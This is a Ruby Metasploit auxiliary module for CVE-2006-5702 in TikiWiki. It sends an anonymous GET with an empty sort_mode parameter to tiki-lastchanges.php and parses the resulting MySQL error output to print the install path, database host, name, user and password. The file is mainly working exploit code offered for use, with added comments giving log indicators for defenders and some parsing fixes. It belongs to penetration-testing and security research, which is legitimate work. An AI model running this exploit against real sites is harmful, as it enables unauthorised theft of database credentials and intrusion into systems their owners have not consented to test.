Path: blob/master/modules/auxiliary/admin/tikiwiki/tikidblib.rb
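##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Auxiliary module for CVE-2006-5702 (TikiWiki information disclosure).
#
# It sends one anonymous GET to tiki-lastchanges.php with an empty
# "sort_mode" parameter and reads database connection settings out of the
# error output returned in the response body.
#
# Defender notes, based only on what this file sends and parses:
# - The request is a GET for <URI>/tiki-lastchanges.php with the query string
#   "days=1&offset=0&sort_mode=" and a fixed MSIE 6.0 User-Agent; both are
#   usable as web-log indicators.
# - The parser expects var_dump-style lines (`["key"]=>` followed by
#   `string(N) "value"`), so the leak appears to depend on the application
#   echoing its database error details to the client.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient

  # Registers module metadata and the single URI option.
  #
  # @param info [Hash] metadata overrides merged through update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'TikiWiki Information Disclosure',
        'Description' => %q{
          A vulnerability has been reported in Tikiwiki, which can be exploited by
          an anonymous user to dump the MySQL user & passwd just by creating a mysql
          error with the "sort_mode" var.

          The vulnerability was reported in Tikiwiki version 1.9.5.
        },
        'Author' => [ 'Matteo Cantoni <goony[at]nothink.org>' ],
        'License' => MSF_LICENSE,
        'References' => [
          ['OSVDB', '30172'],
          ['BID', '20858'],
          ['CVE', '2006-5702'],
          ['URL', 'https://web.archive.org/web/20080211225557/http://secunia.com/advisories/22678/'],
        ],
        'DisclosureDate' => '2006-11-01',
        'Actions' => [
          ['Dump', { 'Description' => 'Dump user and password' }]
        ],
        'DefaultAction' => 'Dump',
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'SideEffects' => [],
          'Reliability' => []
        }
      )
    )

    register_options(
      [
        OptString.new('URI', [true, 'TikiWiki directory path', '/tikiwiki']),
      ]
    )
  end

  # Requests the page with an empty sort_mode and prints any database
  # settings found in the response body.
  #
  # A missing response and a non-OK response are reported separately; the
  # original printed "No response" for both, which hid the difference between
  # an unreachable host and a host that answered without the error dump.
  #
  # @return [void]
  def run
    print_status('Establishing a connection to the target...')

    uri = normalize_uri(datastore['URI'], '/tiki-lastchanges.php')
    # sort_mode is deliberately left empty; per the module description the
    # disclosure comes from the MySQL error this parameter provokes.
    rpath = uri + '?days=1&offset=0&sort_mode='

    res = send_request_raw({
      'uri' => rpath,
      'method' => 'GET',
      'headers' =>
      {
        'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
        'Connection' => 'Close'
      }
    }, 25)

    if res.nil?
      print_status('No response from the server.')
      return
    end

    unless res.message == 'OK'
      print_status("Unexpected response from the server (HTTP #{res.code}).")
      return
    end

    print_status('Get information about database...')

    found = print_dumped_fields(res.body.split(/\r?\n/))
    print_status('Could not obtain information about database.') if found.zero?
  end

  private

  # Key-line patterns paired with the label printed for each value.
  #
  # @return [Array<Array(Regexp, String)>]
  def dump_fields
    [
      [/\["file"\]=>/, 'Install path'],
      [/\["databaseType"\]=>/, 'DB type'],
      [/\["database"\]=>/, 'DB name'],
      [/\["host"\]=>/, 'DB host'],
      [/\["user"\]=>/, 'DB user'],
      [/\["password"\]=>/, 'DB password']
    ]
  end

  # Scans the body lines for known keys and prints the value found on the
  # line that follows each key.
  #
  # The original indexed the following line and the match result without
  # checking either, so a key on the last line, or a value line in an
  # unexpected format, raised NoMethodError. Such entries are skipped here.
  #
  # @param lines [Array<String>] response body split on line breaks
  # @return [Integer] number of values printed (scanning stops at six)
  def print_dumped_fields(lines)
    fields = dump_fields
    found = 0

    lines.each_with_index do |row, idx|
      break if found >= 6

      fields.each do |pattern, label|
        next unless row.match?(pattern)

        # to_s covers a key on the final line, where there is no next line.
        value = lines[idx + 1].to_s[/string\(\d+\) "(.*)"/m, 1]
        next if value.nil?

        found += 1
        print_status("#{label} : #{value}")
      end
    end

    found
  end
end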